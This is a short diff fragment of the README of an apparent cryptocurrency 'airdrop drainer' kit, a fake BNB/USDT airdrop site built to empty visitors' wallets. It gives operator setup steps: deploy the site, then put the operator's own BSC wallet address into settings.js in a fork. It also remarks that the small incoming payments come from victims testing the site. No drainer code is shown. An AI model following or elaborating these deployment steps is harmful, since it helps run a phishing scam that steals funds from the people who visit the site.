solrac171717/bnb-usdt-airdrop-drainer/README.md

 3. deploy

-4. Add your wallet to settings.js file use bsc address
+4. Add your wallet to settings.js file use bsc address make sure its on your forked

 If you notice small payments made to you thats because most people test the site with small amounts